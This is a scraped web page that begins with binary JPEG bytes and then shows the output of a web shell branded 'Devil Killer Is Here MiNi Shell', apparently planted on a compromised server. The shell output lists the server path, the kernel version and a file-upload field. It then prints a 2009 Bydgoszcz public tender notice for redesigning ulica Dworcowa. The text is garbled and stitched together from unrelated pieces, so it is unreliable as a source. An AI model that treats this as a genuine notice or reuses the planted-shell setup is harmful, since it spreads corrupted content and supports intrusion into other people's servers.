JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091014/177611-N-2009.html

<p class="kh_header"><b>Bydgoszcz: Opracowanie dokumentacji projektowej na przebudowę ulicy Dworcowej w Bydgoszczy, na odcinku od ul. Matejki do ul. Gdańskiej</b><br>
<b>Numer ogłoszenia: 177611 - 2009; data zamieszczenia: 14.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich i Komunikacji Publicznej , ul. Toruńska 174a, 85-830 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5822723, faks 052 5822363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdmikp.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na przebudowę ulicy Dworcowej w Bydgoszczy, na odcinku od ul. Matejki do ul. Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej (koncepcji komunikacyjnej obszaru Śródmieścia i architektonicznej dla przebudowy ulicy, projektu  budowlanego i wielobranżowego wykonawczego wraz z przedmiarami robót, kosztorysem inwestorskim i specyfikacjami technicznymi), dla przebudowy ulicy Dworcowej 
w Bydgoszczy, na odcinku od ul. Matejki do ul. Gdańskiej (długości ok. 700 m), wraz z uzyskaniem decyzji o pozwoleniu na budowę.
W ramach zamówienia Wykonawca zobowiązany będzie do opracowania dokumentacji dla zadania zgodnie z formalno-prawnymi wymogami dla projektów inwestycyjnych współfinansowanych ze środków unijnych w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego (oś priorytetowa VII, działanie 7.1  - Rewitalizacja zdegradowanych dzielnic miasta).
2. Opis szczegółowy i charakterystyka zadania: 
Stan istniejący
Ulica Dworcowa, na odcinku od ul. Matejki do ul. Gdańskiej ma nawierzchnię z bruku kamiennego - kostka rzędowa, która w rejonie skrzyżowań pokryta jest nawierzchnią bitumiczną. Chodniki ze zniszczonych płytek chodnikowych betonowych 30x30 cm, z kostki betonowej i trylinki, częściowo pokryte nawierzchnią bitumiczną, krawężniki kamienne, wjazdy z trylinki i kostki betonowej. Na skrzyżowaniu z ul. Gdańską i ul. Pomorską istnieje przebudowana nawierzchnia z kostki betonowej, starobruku. W jezdni usytuowane jest nieczynne torowisko tramwajowe. W chodnikach usytuowane są liczne wsypy do okien piwnicznych. Na przedmiotowym odcinku ulicy brak jest zieleni przyulicznej ( drzew i krzewów), pojedyncze drzewa rosną jedynie w rejonie skrzyżowania z ul. Matejki. Projektowany odcinek jest całkowicie uzbrojony. Posiada wodociąg fi 300 mm PE, sieć gazową fi 200 mm, kanalizację piętrową kds fi 300/200 mm i kds fi 700/300 mm, kanalizację teletechniczną i kable energetyczne. Istnieje oświetlenie ulicy na ścianach budynków oraz pojedyncze słupy oświetleniowe. Szerokość pasa drogowego wynosi od 10 do 18 m. 
Stan projektowy 
1) Miejscowy plan zagospodarowania przestrzennego  - brak
2) Kategoria drogi/ulicy  - powiatowa
3) Klasa funkcjonalno-użytkowa - lokalna
5) Typy skrzyżowań - zwykłe.
6) Szerokość pasa drogowego  - 10 - 18 m
Wytyczne dotyczące koncepcji: 
1.	Opracować koncepcję obsługi komunikacyjnej (rozkład przestrzenny ruchu) części obszaru Śródmieścia miasta Bydgoszczy ograniczonego następującymi ulicami: Jagiellońska - Focha - Marcinkowskiego - Dworcowa - Królowej Jadwigi - Rejtana - Sobieskiego - Hetmańska - Świętojańska - Mickiewicza - Paderewskiego - Staszica - 3 Maja (załącznik nr 1). 
2.	Opracowanie należy poprzedzić pomiarami ruchu drogowego obejmującymi:
a)	Pomiar ruchu na wszystkich wlotach i wylotach do w/w strefy 
z podziałem na strukturę rodzajową pojazdów (pomiar kordonowy - więźba ruchu) - pomiar przeprowadzić w dzień powszedni (wtorek - czwartek) w godz. 6.00 - 20.00 (14 godzin pomiarowych). Mając na uwadze duże wahania ruchu pomiar należy przeprowadzić dwukrotnie - załącznik nr 1. 
b)	Pomiar ruchu na skrzyżowaniach wewnątrz strefy oraz na skrzyżowaniach ograniczających strefę - pomiar wykonać w godzinie szczytu popołudniowego oraz porannego (2 godz. pomiaru) - godzina szczytu ustalona na podstawie pomiaru przeprowadzonego w punkcie a). Mając na uwadze duże wahania ruchu pomiar należy przeprowadzić dwukrotnie - załącznik nr 1.
c)	Przeprowadzić badania ankietowe na reprezentatywnej grupie respondentów dotyczące oczekiwań w zakresie rozwiązań transportowych dla w/w strefy.
d)	Ewidencja liczby miejsc parkingowych dostępnych w w/w strefie z podziałem: miejsca parkingowe w pasach drogowych ulic, miejsca parkingowe poza pasami drogowymi, miejsca parkingowe w pasach drogowych objęte Strefą Płatnego Parkowania. Ewidencję należy przedstawić na planie sytuacyjnym z podziałem na poszczególne ulice oraz obszary wewnątrz pokazane w załączniku nr 1.
e)	Ewidencja postojów taxi (stopień wykorzystania miejsc postojowych), potrzeby rzeczywiste.

3.	Koncepcja obsługi komunikacyjnej części obszaru Śródmieścia będzie składała się z następujących elementów.
a)	Diagnoza stanu istniejącego wraz z graficznym przedstawieniem układu drogowego (struktura kierunkowa ruchu na skrzyżowaniach oraz odcinkach, główne kierunki ruchu pieszych oraz rowerzystów, statystyka miejsc parkingowych) oraz komunikacji zbiorowej wraz z lokalizacją przystanków.
b)	Diagnoza zagospodarowania przestrzennego obszaru z podziałem na funkcje użytkowe.
c)	Wyniki wykonanych pomiarów ruchu (diagramy ruchu, więźba ruchu) oraz ewidencji liczby miejsc parkingowych - przedstawienie graficzne oraz tabelaryczne.
d)	Na podstawie badań ruchu opracować mikromodel ruchu dla obszaru wyznaczonego 
w załączniku nr 1.
e)	Opracowanie koncepcji dostępności części obszaru Śródmieścia - podział na strefy funkcjonalne (strefa wyłączona z ruchu pojazdów, strefy o ograniczonej dostępności, brak ograniczenia dostępności) - opracowanie graficzne. Opracowanie należy wykonać na podstawie diagnozy oraz na podstawie wyników badań przedstawionych w materiałach pn. - Analiza parkowania w Obszarze Płatnego Parkowania w Bydgoszczy - opracowanie własne ZDMiKP.
f)	Transport zbiorowy - docelowy układ przemieszczeń środków komunikacji zbiorowej wraz 
z planowaną lokalizacją przystanków - komunikacja tramwajowa i autobusowa - opracowanie graficzne. Analiza dostępności komunikacji zbiorowej na podstawie stref dojścia.
g)	Ruch pieszych - koncepcja prowadzenia ruchu pieszego wzdłuż ulic oraz w nawiązaniu do elementów zagospodarowania przestrzennego istniejących oraz planowanych np. parki miejskie, parkingi kubaturowe.
h)	Ruch rowerowy - koncepcja prowadzenia dróg rowerowych w nawiązaniu do uwarunkowań zewnętrznych obszarów oraz obiektów generujących ruch rowerowy.
i)	Transport indywidualny - docelowy układ przemieszczeń komunikacji indywidualnej 
w powiązaniu z planowanymi strefami dostępności obszaru Śródmieścia oraz planowanymi przestrzeniami parkingowymi - opracowanie graficzne. Należy zaplanować miejsca postojowe wzdłuż istniejących ulic oraz przedstawić propozycję lokalizacji parkingów kubaturowych. 
j)	Transport ciężarowy - koncepcja przemieszczeń pojazdów ciężarowych wraz ograniczeniem ruchu pojazdów ciężarowych całkowitym oraz dostępność czasowa - opracowanie graficzne.
k)	Wyznaczenie docelowej lokalizacji postojów taxi oraz dostępności w analizowanym obszarze.

4.	Na podstawie koncepcji obsługi komunikacyjnej części obszaru Śródmieścia opracować docelowe przekroje poprzeczne dla ulic znajdujących się w przedmiotowej strefie.

5.	Na podstawie koncepcji obsługi komunikacyjnej części obszaru Śródmieścia opracować 3 warianty koncepcji ulicy Dworcowej od ul. Matejki do ul. Gdańskiej w nawiązaniu do projektu pn. Budowa linii tramwajowej z centrum miasta do dworca kolejowego Bydgoszcz Główna z rozbudową ulic: Marszałka Focha, Naruszewicza, Dworcowa, Zygmunta Augusta w Bydgoszczy.

6.	Projekt organizacji ruchu musi zostać opracowany w oparciu o ustalenia zawarte w koncepcji obsługi komunikacyjnej części obszaru Śródmieścia - rozwiązanie etapowe konieczne do realizacji w ramach zadania rewitalizacji ulicy Dworcowej.

7.	Opracować prognozę ruchu drogowego dla badanego obszaru w dwóch horyzontach czasowych: a) realizacja ulicy Dworcowej - rok 2012, b) zmiany w układzie docelowym - rok 2020.

8.	Opracować prezentację tematu przygotowaną w ramach punktów 1 - 7 w formacie plików *.ppt (program PowerPoint).

9.	Forma opracowań - Opracowanie należy przedstawić w formie opisu części teoretycznej wraz z rysunkami, mapami niezbędnymi do zilustrowania treści opracowania - 5 egzemplarzy. Przygotowanie prezentacji tematu w formie elektronicznej w formacie *.ppt. Opracowanie należy utrwalić na nośniku elektronicznym w formacie *.dgn lub *.dwg (grafika), oraz *.doc i *.xls (tekst i tabele) oraz dodatkowo całość opracowania w *.pdf. 

W jednym z trzech wariantów koncepcji należy uwzględnić budowę torowiska tramwajowego, wahadłowego, charakteryzującego się parametrami technicznymi pozwalającymi na poruszanie się wyłącznie tramwajami zabytkowymi typu HERBRAND, do wycieczkowo-rekreacyjnej obsługi turystów.

Dla każdego z trzech wariantów koncepcji należy opracować część kosztową określającą koszt przewidywanych robót.
Na podstawie wyników analiz przeprowadzonych w ramach trzech wariantów koncepcji należy podjąć decyzję o rodzaju zagospodarowania pasa drogowego ul. Dworcowej (ciąg spacerowy, pieszo-jezdnia, jezdnia i chodniki, miejsca postojowe, ścieżka rowerowa, jednotorowa linia tramwajowa).
Wytyczne dotyczące projektu budowlanego i wykonawczych:

1.	Rodzaj nawierzchni ulicy uzgodnić z Miejskim Konserwatorem Zabytków i Zamawiającym na etapie sporządzenia koncepcji przebudowy.
2.	Kategoria ruchu - KR2.

Odwodnienie ulicy:
1.	Odprowadzenie wód opadowych i roztopowych z jezdni należy zaprojektować w nawiązaniu do ulicznego kanału deszczowego kds 300/200 - 700/300.
2.	Przewidzieć przebudowę i regulację istniejących studni kanalizacyjnych do nowej niwelety drogi na warunkach gestora sieci kds - MWiK Sp. z o.o.
3.	Projektować wpusty uliczne proste z osadnikiem D400 bez syfonu, pierścieniem odciążającym, z kratą z żeliwa szarego na zawiasach z ryglem,
4.	W trakcie projektowania konsultować się z przedstawicielem ZDMiKP Wydział TB tel. 052 582 23 48.
5.	Projekt budowlany i wykonawczy przedłożyć do uzgodnienia w ZDMiKP w Wydziale TB i MWiK Sp. z o.o.

Oświetlenie ulicy:
1.	Projektować budowę oświetlenia ulicznego.
2.	Zasilanie obwodów oświetleniowych z istniejącej szafy oświetleniowej przy ul. Gimnazjalnej oraz z szafy oświetleniowej przy ul. Dworcowa/Matejki (ujęta w projekcie - Tramwaj do Dworca.
3.	Kable oświetleniowe typu YKY.
4.	Słupy oświetleniowe stylowe wzór - bydgoski.
5.	Oprawy oświetleniowe Philips City Spiryt lub równoważne.
6.	Wyprowadzić oświetlenie w ulice przyległe do ul. Dworcowej.
7.	Zdemontować istniejące oświetlenie.
8.	Uzyskać równomierność oświetlenia w zakresie od 0,6 do 0,4.
9.	Wystąpić do ENEA o modernizację sieci energetycznej będącej własnością ENEA.
10.	Przedstawić koncepcje projektowanego oświetlenia celem akceptacji.
11.	W trakcie projektowania konsultować się z przedstawicielem ZDMiKP Wydział TU/E tel. 052 582 23 17.
12.	Dokumentacja projektowa podlega uzgodnieniu w ZDMiKP Wydział TU/E i ENEA.

W projekcie należy uwzględnić przebudowę istniejących urządzeń podziemnych i nadziemnych wynikającą z kolizji z projektowaną ulicą i warunków gestorów urządzeń. 
W załączeniu pisma i warunki gestorów urządzeń:
1.	Pomorska Spółka Gazownictwa Sp. z o.o., Oddział Zakład Gazowniczy w Bydgoszczy -  z dnia 14.07.2009r., znak OZGB/EBT/1239/09.
2.	Miejskie Wodociągi i Kanalizacja w Bydgoszczy Sp. z o.o. - z dnia 15.07.2009r., znak RT.405/0646/2009.
3.	Netia S.A. - nr 276/DP/08 z dnia 10.07.2009r., znak N-OP/58/2009.
4.	KPEC Sp. z o.o. z dnia 24.08.2009r., znak EE/812/3663/2009.
5.	ENEA Operator Rejon Dystrybucji Bydgoszcz z dnia 24.07.2009r., znak OD/ZM 24774/2009.

W ramach zamówienia Wykonawca zobowiązany będzie do:
-	uzyskania podkładu geodezyjnego do celów projektowych z naniesionymi rzędnymi istniejących wjazdów na teren posesji,
-	wykonania koncepcji komunikacyjnej obszaru Śródmieścia i architektonicznej dla przebudowy ulicy,
-	sporządzenia Studium Wykonalności zgodnie z wytycznymi obowiązującymi w zakresie opracowywania studiów wykonalności dla projektów współfinansowanych ze środków unijnych w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko Pomorskiego dla osi priorytetowej VII działanie 7.1 - Rewitalizacja zdegradowanych dzielnic miasta
-	wykonania projektu budowlanego z niezbędnymi uzgodnieniami,
-	wykonania projektów wykonawczych w zakresie:
a)	robót drogowych,
b)	kanalizacji deszczowej,
c)	oświetlenia ulicznego,
d)	organizacji ruchu docelowego,
e)	linii tramwajowej jednotorowej - w przypadku podjęcia decyzji o projektowaniu,
f)	sieci trakcyjnej tramwajowej- w przypadku podjęcia decyzji o projektowaniu,
g)	opracowania geotechnicznych warunków posadowienia obiektów budowlanych dla przebudowy ulicy,
h)	ewentualnej przebudowy urządzeń podziemnych i nadziemnych (tj. wodociągu, kanalizacji sanitarnej,  sieci energetycznej, gazowej, telekomunikacyjnej) wynikającej z kolizji i warunków gestorów urządzeń, zaakceptowanych przez ZDMiKP,
-	sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia, Zgodnie z Prawem Budowlanym, ust. 20, pkt. 1, ust. 1b,
-	sporządzenia szczegółowych specyfikacji technicznych wykonania i odbioru robót na podstawie aktualnie obowiązujących Ogólnych Specyfikacji Technicznych wydanych przez Generalną Dyrekcję Dróg Krajowych i Autostrad (dla asortymentów robót nieuwzględnionych w OST sporządzić opracowania indywidualne),
-	przygotowania materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia budowlanego w oparciu o ustawę z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (Dz.U. 06.129.902 z późniejszymi zmianami), wystąpienia o wydanie powyższej decyzji i uzyskania jej,
-	wykonania planszy zbiorczej uzbrojenia istniejącego i projektowanego- w kolorze,
-	wykonania wypisów z rejestru gruntów i wykazu działek zajmowanych pod inwestycję i sąsiadujących z nią wraz naniesioną na mapę obrębową linią rozgraniczenia ulicy,
-	wykonania przedmiarów robót oraz kosztorysu inwestorskiego,
-	uzyskania decyzji o pozwoleniu na budowę.

Przy opracowaniu poszczególnych części projektu należy uwzględnić następujące zalecenia: 
-	projekty wykonawcze powinny posiadać wszystkie niezbędne szczegółowe rozwiązania wynikające z przedmiotu zamówienia i niezbędne do zrealizowania zadania,
-	projekt powinien posiadać wykaz opracowań oraz pisemnie oświadczenie Jednostki Projektującej, że wykonany jest zgodnie z umową, obowiązującymi normami i został wykonany w stanie kompletnym z punktu widzenia celu, któremu ma służyć,
-	na wniosek Zamawiającego Wykonawca zobowiązany będzie do uczestniczenia w procesie konsultacji społecznych,
-	jednostka projektująca przekaże Zamawiającemu dokumentację w siedzibie Zamawiającego.
Części opisowe wykonane będą za pomocą komputerowego edytora tekstów kompatybilnego z MS Word, przedmiary robót  dostarczyć także w wersji elektronicznej w formacie danych kompatybilnych z MS Excel lub MS Word.

Wytyczne techniczne do opracowania dokumentacji projektowej:
1.	Przed przystąpieniem do opracowania projektu należy przeprowadzić badania geotechniczne podłoża gruntowego,
2.	Zamawiający upoważnia Wykonawcę do występowania w jego imieniu w sprawach  dot. uzyskania warunków technicznych od gestorów sieci i urządzeń, w sprawie uzyskania decyzji o pozwoleniu na budowę,
3.	Rodzaj nawierzchni uzgodniony zostanie z Miejskim Konserwatorem Zabytków i Zamawiającym na etapie zatwierdzenia koncepcji,
4.	Konsultować z Zamawiającym zakres robót,
5.	Na etapie sporządzenia koncepcji ustalić z Głównym Specjalistą ds. ruchu drogowego i Wydziałem Inżynierii Ruchu ZDMiKP szczegółowe warunki do projektowania - podstawowe dane techniczno - ruchowe, warunki do projektowania z zakresu oznakowania i urządzeń bezpieczeństwa ruchu,
6.	Wykorzystać w opracowywanej dokumentacji najnowsze rozwiązania technologiczne,
7.	Projekt budowlany winien uzyskać wymagane przepisami szczegółowymi opinie i uzgodnienia,
8.	Uzyskać akceptację Zamawiającego dla warunków wydanych przez gestorów sieci,
9.	Wszelką korespondencję w sprawach związanych z pracami projektowymi należy prowadzić z powiadomieniem Zamawiającego.
Zakres opracowania:
1.	Koncepcja architektoniczno- komunikacyjna - 5 kpl.
2.	Studium wykonalności - 5 kpl.
3.	Projekt budowlany - 5 kpl. 
4.	Projekty wykonawcze - 5 kpl.
5.	Przedmiary robót  - 5 kpl.
6.	Specyfikacje techniczne - 5 egz.
7.	Kosztorys inwestorski - 1 egz.
8.	Decyzja o pozwoleniu na budowę.
Elementy wskazane w pkt.1 do 7 należy dodatkowo wykonać i przekazać Zamawiającemu na nośniku elektronicznym (CD) w formacie: pdf (całość opracowania) i w formacie dgn (mapy), oraz jako dokument programu Microsoft Word (opisy techniczne, specyfikacje techniczne i przedmiary robót i studium wykonalności)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 5.000,00 PLN
(słownie: pięć tysięcy złotych 00/100), przed upływem terminu składania ofert.
2.	Wadium może być wnoszone w jednej lub kilku formach, określonych w art. 45 ust. 6 UPZP.
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego, 
tj. Bank Pocztowy S.A. O/Bydgoszcz - Nr konta 98 1320 1117 2031 0044 2000 0386 
z adnotacją - WADIUM - dokumentacja projektowa na przebudowę ulicy Dworcowej 
w Bydgoszczy, na odcinku od ul. Matejki do ul. Gdańskiej.
4.	Dowód wniesienia wadium:
1)	zaleca się dołączyć do oferty potwierdzenie przelewu pieniędzy na rachunek bankowy Zamawiającego - w formie kserokopii poświadczonej za zgodność z oryginałem przez osobę/y upoważnioną/e do reprezentowania Wykonawcy, zgodnie z formą reprezentacji, określoną w rejestrze sądowym lub innym dokumencie,
2)	potwierdzenie wniesienia wadium w pozostałych formach określonych w art. 45 ust. 6 UPZP - należy dołączyć do oferty w formie oryginału.
5.	Wadium pozostaje w dyspozycji Zamawiającego i będzie zwrócone lub zatrzymane, 
na zasadach i w trybie określonym w art. 46 UPZP.
6.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi 
z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone 
o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zgodnie z art. 44 UPZP spełniają warunki udziału w postępowaniu, określone przez Zamawiającego na podstawie art. 22 ust. 1 UPZP, tj.:
1.	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia,
tj. projektantami oraz projektantami sprawdzającymi rozwiązania projektowe posiadającymi: 
1)	uprawnienia zawodowe do projektowania bez ograniczeń w zakresie odpowiadającym przedmiotowi zamówienia, w tym w specjalnościach: 
-	drogowej - min.: 1 projektant i 1 sprawdzający rozwiązania projektowe, 
-	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych 
 	i kanalizacyjnych - min.: 1 projektant i 1 sprawdzający rozwiązania projektowe,, 
-	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych - min.: 1 projektant i 1 sprawdzający rozwiązania projektowe,.
wymagane przepisami ustawy Prawo Budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 
z późn. zm.) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dn. 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. 
Nr 83. poz. 578 z późn. zm.);
2)	min. pięcioletnie doświadczenie w projektowaniu w danej specjalności od daty uzyskania uprawnień projektowych.
2.	posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, potwierdzone wykonaniem, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum  jednej usługi w zakresie:
	- sporządzenia dokumentacji projektowej na budowę lub przebudowę ulicy o klasie funkcjonalno-technicznej minimum L o długości nie mniejszej niż 500 m, której elementem było oświetlenie uliczne, 
	- 	zaprojektowanie linii tramwajowej min. jednotorowej o długości min. 500 m.
Warunek uważa się za spełniony łącznie (ww zakres zrealizowany w jednym zadaniu) 
i oddzielnie (ww. zakres zrealizowany w odrębnych zadaniach)
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:
1)	posiadają środki finansowe, lub zdolność kredytową w wysokości nie mniejszej niż 
100.000,00 PLN (słownie: sto tysięcy złotych 00/100),
2)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej
działalności.
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 
24 UPZP.
Sposób dokonywania oceny spełniania warunków udziału w postępowaniu.
1.		Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, na podstawie analizy dokumentów lub oświadczeń dołączonych przez Wykonawcę do oferty.
2.	Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu określonych w pkt. 10.1. SIWZ nie później niż w dniu upływu terminu składania ofert.
	3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23. UPZP 
(np. konsorcjum, spółka cywilna), spełniają warunki udziału w postępowaniu w następujący sposób:
1) warunki udziału w postępowaniu określone w pkt 10.1.1., 10.1.2. i 10.1.3. SIWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego spełniają łącznie,
2) warunek udziału w postępowaniu określony w pkt 10.1.4 SIWZ każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego musi spełniać oddzielnie..</li>
